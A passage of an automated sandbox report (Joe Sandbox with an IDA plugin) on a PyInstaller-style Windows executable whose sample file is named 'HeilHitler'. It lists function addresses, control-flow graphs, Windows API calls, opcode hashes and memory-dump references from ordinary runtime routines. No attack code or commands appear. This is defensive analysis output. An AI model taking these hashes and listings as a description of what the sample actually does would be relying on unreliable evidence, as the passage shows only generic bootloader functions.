                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                            • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                            • Instruction ID: 1c2119cbf279b8d7d58f80f071047de15deef92be4f66182e6d03bbbaf58a44b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD412821B29A1281FB15CF96AC126752391BF49BD0F894739DD1DEB7A4EF3CE415A300
                                                                                                                                                                                                                                            Function 00007FF633D636B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF633D63804), ref: 00007FF633D636E1
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D63804), ref: 00007FF633D636EB
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62C9E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62D63
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62C50: MessageBoxW.USER32 ref: 00007FF633D62D99
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                            • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                            • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                            • Instruction ID: c13f2a38a5be17a066d117a47e39e6235b7b3cb1b116aea74476be53e48fcbf7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217161F1864281FB609BA4E8573B67290BF88354FC01332E56EE77E5EE2CE505E700
                                                                                                                                                                                                                                            Function 00007FF633D7BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 746 7ff633d7ba5c-7ff633d7ba82 747 7ff633d7ba9d-7ff633d7baa1 746->747 748 7ff633d7ba84-7ff633d7ba98 call 7ff633d74ee8 call 7ff633d74f08 746->748 750 7ff633d7be77-7ff633d7be83 call 7ff633d74ee8 call 7ff633d74f08 747->750 751 7ff633d7baa7-7ff633d7baae 747->751 766 7ff633d7be8e 748->766 768 7ff633d7be89 call 7ff633d7a8e0 750->768 751->750 753 7ff633d7bab4-7ff633d7bae2 751->753 753->750 757 7ff633d7bae8-7ff633d7baef 753->757 758 7ff633d7bb08-7ff633d7bb0b 757->758 759 7ff633d7baf1-7ff633d7bb03 call 7ff633d74ee8 call 7ff633d74f08 757->759 764 7ff633d7be73-7ff633d7be75 758->764 765 7ff633d7bb11-7ff633d7bb17 758->765 759->768 769 7ff633d7be91-7ff633d7bea8 764->769 765->764 770 7ff633d7bb1d-7ff633d7bb20 765->770 766->769 768->766 770->759 773 7ff633d7bb22-7ff633d7bb47 770->773 775 7ff633d7bb7a-7ff633d7bb81 773->775 776 7ff633d7bb49-7ff633d7bb4b 773->776 777 7ff633d7bb56-7ff633d7bb6d call 7ff633d74ee8 call 7ff633d74f08 call 7ff633d7a8e0 775->777 778 7ff633d7bb83-7ff633d7bbab call 7ff633d7d5fc call 7ff633d7a948 * 2 775->778 779 7ff633d7bb4d-7ff633d7bb54 776->779 780 7ff633d7bb72-7ff633d7bb78 776->780 807 7ff633d7bd00 777->807 809 7ff633d7bbad-7ff633d7bbc3 call 7ff633d74f08 call 7ff633d74ee8 778->809 810 7ff633d7bbc8-7ff633d7bbf3 call 7ff633d7c284 778->810 779->777 779->780 781 7ff633d7bbf8-7ff633d7bc0f 780->781 784 7ff633d7bc8a-7ff633d7bc94 call 7ff633d8391c 781->784 785 7ff633d7bc11-7ff633d7bc19 781->785 796 7ff633d7bc9a-7ff633d7bcaf 784->796 797 7ff633d7bd1e 784->797 785->784 788 7ff633d7bc1b-7ff633d7bc1d 785->788 788->784 792 7ff633d7bc1f-7ff633d7bc35 788->792 792->784 799 7ff633d7bc37-7ff633d7bc43 792->799 796->797 801 7ff633d7bcb1-7ff633d7bcc3 GetConsoleMode 796->801 805 7ff633d7bd23-7ff633d7bd43 ReadFile 797->805 799->784 803 7ff633d7bc45-7ff633d7bc47 799->803 801->797 806 7ff633d7bcc5-7ff633d7bccd 801->806 803->784 808 7ff633d7bc49-7ff633d7bc61 803->808 811 7ff633d7be3d-7ff633d7be46 GetLastError 805->811 812 7ff633d7bd49-7ff633d7bd51 805->812 806->805 814 7ff633d7bccf-7ff633d7bcf1 ReadConsoleW 806->814 817 7ff633d7bd03-7ff633d7bd0d call 7ff633d7a948 807->817 808->784 818 7ff633d7bc63-7ff633d7bc6f 808->818 809->807 810->781 815 7ff633d7be48-7ff633d7be5e call 7ff633d74f08 call 7ff633d74ee8 811->815 816 7ff633d7be63-7ff633d7be66 811->816 812->811 820 7ff633d7bd57 812->820 823 7ff633d7bcf3 GetLastError 814->823 824 7ff633d7bd12-7ff633d7bd1c 814->824 815->807 828 7ff633d7be6c-7ff633d7be6e 816->828 829 7ff633d7bcf9-7ff633d7bcfb call 7ff633d74e7c 816->829 817->769 818->784 827 7ff633d7bc71-7ff633d7bc73 818->827 821 7ff633d7bd5e-7ff633d7bd73 820->821 821->817 831 7ff633d7bd75-7ff633d7bd80 821->831 823->829 824->821 827->784 835 7ff633d7bc75-7ff633d7bc85 827->835 828->817 829->807 837 7ff633d7bda7-7ff633d7bdaf 831->837 838 7ff633d7bd82-7ff633d7bd9b call 7ff633d7b674 831->838 835->784 842 7ff633d7be2b-7ff633d7be38 call 7ff633d7b4b4 837->842 843 7ff633d7bdb1-7ff633d7bdc3 837->843 846 7ff633d7bda0-7ff633d7bda2 838->846 842->846 847 7ff633d7bdc5 843->847 848 7ff633d7be1e-7ff633d7be26 843->848 846->817 850 7ff633d7bdca-7ff633d7bdd1 847->850 848->817 851 7ff633d7be0d-7ff633d7be18 850->851 852 7ff633d7bdd3-7ff633d7bdd7 850->852 851->848 853 7ff633d7bdd9-7ff633d7bde0 852->853 854 7ff633d7bdf3 852->854 853->854 855 7ff633d7bde2-7ff633d7bde6 853->855 856 7ff633d7bdf9-7ff633d7be09 854->856 855->854 857 7ff633d7bde8-7ff633d7bdf1 855->857 856->850 858 7ff633d7be0b 856->858 857->856 858->848
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                            • Instruction ID: 41e7c414f1f24851d6bd88147b24f59ed5fc926e818fa220cb428853ac172b60
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DC12922A1CB8781E7619F9590462BD7B60FF81B90F594331EA8EA3791CF7CE845A700
                                                                                                                                                                                                                                            Function 00007FF633D68570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                                            • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                            • Instruction ID: 85ca96772ff03f063ac1d8247f753327b3eae382b12b32df1e19e35e9204c46f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4216031A0C64642EB108BD5B54523AB3A0FF857A1F901335EABD97BE5DE7CE4459B00
                                                                                                                                                                                                                                            Function 00007FF633D690E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: GetCurrentProcess.KERNEL32 ref: 00007FF633D68590
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: OpenProcessToken.ADVAPI32 ref: 00007FF633D685A3
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: GetTokenInformation.KERNELBASE ref: 00007FF633D685C8
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: GetLastError.KERNEL32 ref: 00007FF633D685D2
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: GetTokenInformation.KERNELBASE ref: 00007FF633D68612
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF633D6862E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: CloseHandle.KERNEL32 ref: 00007FF633D68646
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF633D63C55), ref: 00007FF633D6916C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF633D63C55), ref: 00007FF633D69175
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                            • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                            • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                            • Instruction ID: 52e6a2a20fb17ffffbb22bd5cc981b543d1c9b245fb98ce262a9502fd989064b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF213231A0874281F6109B90E9162FA7261FF84780F945236EA5EE77D6DF3CE945E740
                                                                                                                                                                                                                                            Function 00007FF633D7CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 965 7ff633d7cf60-7ff633d7cf85 966 7ff633d7cf8b-7ff633d7cf8e 965->966 967 7ff633d7d253 965->967 969 7ff633d7cfc7-7ff633d7cff3 966->969 970 7ff633d7cf90-7ff633d7cfc2 call 7ff633d7a814 966->970 968 7ff633d7d255-7ff633d7d265 967->968 971 7ff633d7cff5-7ff633d7cffc 969->971 972 7ff633d7cffe-7ff633d7d004 969->972 970->968 971->970 971->972 974 7ff633d7d006-7ff633d7d00f call 7ff633d7c320 972->974 975 7ff633d7d014-7ff633d7d029 call 7ff633d8391c 972->975 974->975 980 7ff633d7d143-7ff633d7d14c 975->980 981 7ff633d7d02f-7ff633d7d038 975->981 982 7ff633d7d1a0-7ff633d7d1c5 WriteFile 980->982 983 7ff633d7d14e-7ff633d7d154 980->983 981->980 984 7ff633d7d03e-7ff633d7d042 981->984 985 7ff633d7d1c7-7ff633d7d1cd GetLastError 982->985 986 7ff633d7d1d0 982->986 987 7ff633d7d18c-7ff633d7d19e call 7ff633d7ca18 983->987 988 7ff633d7d156-7ff633d7d159 983->988 989 7ff633d7d044-7ff633d7d04c call 7ff633d747c0 984->989 990 7ff633d7d053-7ff633d7d05e 984->990 985->986 992 7ff633d7d1d3 986->992 1008 7ff633d7d130-7ff633d7d137 987->1008 993 7ff633d7d15b-7ff633d7d15e 988->993 994 7ff633d7d178-7ff633d7d18a call 7ff633d7cc38 988->994 989->990 996 7ff633d7d060-7ff633d7d069 990->996 997 7ff633d7d06f-7ff633d7d084 GetConsoleMode 990->997 1001 7ff633d7d1d8 992->1001 1002 7ff633d7d1e4-7ff633d7d1ee 993->1002 1003 7ff633d7d164-7ff633d7d176 call 7ff633d7cb1c 993->1003 994->1008 996->980 996->997 998 7ff633d7d13c 997->998 999 7ff633d7d08a-7ff633d7d090 997->999 998->980 1006 7ff633d7d119-7ff633d7d12b call 7ff633d7c5a0 999->1006 1007 7ff633d7d096-7ff633d7d099 999->1007 1009 7ff633d7d1dd 1001->1009 1010 7ff633d7d24c-7ff633d7d251 1002->1010 1011 7ff633d7d1f0-7ff633d7d1f5 1002->1011 1003->1008 1006->1008 1015 7ff633d7d09b-7ff633d7d09e 1007->1015 1016 7ff633d7d0a4-7ff633d7d0b2 1007->1016 1008->1001 1009->1002 1010->968 1017 7ff633d7d1f7-7ff633d7d1fa 1011->1017 1018 7ff633d7d223-7ff633d7d22d 1011->1018 1015->1009 1015->1016 1022 7ff633d7d0b4 1016->1022 1023 7ff633d7d110-7ff633d7d114 1016->1023 1024 7ff633d7d1fc-7ff633d7d20b 1017->1024 1025 7ff633d7d213-7ff633d7d21e call 7ff633d74ec4 1017->1025 1020 7ff633d7d234-7ff633d7d243 1018->1020 1021 7ff633d7d22f-7ff633d7d232 1018->1021 1020->1010 1021->967 1021->1020 1026 7ff633d7d0b8-7ff633d7d0cf call 7ff633d839e8 1022->1026 1023->992 1024->1025 1025->1018 1031 7ff633d7d107-7ff633d7d10d GetLastError 1026->1031 1032 7ff633d7d0d1-7ff633d7d0dd 1026->1032 1031->1023 1033 7ff633d7d0fc-7ff633d7d103 1032->1033 1034 7ff633d7d0df-7ff633d7d0f1 call 7ff633d839e8 1032->1034 1033->1023 1036 7ff633d7d105 1033->1036 1034->1031 1038 7ff633d7d0f3-7ff633d7d0fa 1034->1038 1036->1026 1038->1033
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF633D7CF4B), ref: 00007FF633D7D07C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF633D7CF4B), ref: 00007FF633D7D107
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                                            • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                            • Instruction ID: 2c5950925b83d471098b633555e2b176a57b7e2ae5c35f46bfe30bf5c18bcbd7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA91D772F1865189F7609FA594422BD2BA0BB44B88F545339DE0EB7B98DF3CE446E700
                                                                                                                                                                                                                                            Function 00007FF633D75628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                                                            • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                            • Instruction ID: b6ea347872c606fc651df10970017495f6d5f098589fa492bb20860db60ab8b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB41AF22E1878283E7508FA095123BD7361FB947A4F109335EAAC97BD2DF7CA5E19701
                                                                                                                                                                                                                                            Function 00007FF633D6CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                                            • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                            • Instruction ID: 225631809ee873c906d65c0a2f884c8556d03b12ba005d688212f58f9edddcff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E315D21E0C14745FA14ABE5A4533B93691AF41784F845734EA2EFB3E7DE6CB804E710
                                                                                                                                                                                                                                            Function 00007FF633D79A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                            • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                            • Instruction ID: 680f331bb7deda9891d330232410544df533785e7e569a43170d11caffb2d2f3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84D06C11B09B0642EA182FB1589B07812556F88B01B142638C82FAA393ED3CB84D6300
                                                                                                                                                                                                                                            Function 00007FF633D7013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
